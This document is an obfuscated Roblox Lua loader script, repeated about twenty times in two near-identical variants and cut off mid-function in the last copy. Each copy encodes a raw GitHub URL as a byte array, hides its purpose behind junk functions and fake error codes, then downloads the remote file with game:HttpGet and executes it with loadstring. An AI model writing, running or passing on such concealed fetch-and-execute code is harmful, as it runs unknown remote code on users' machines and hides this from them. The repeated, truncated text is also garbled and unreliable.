-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
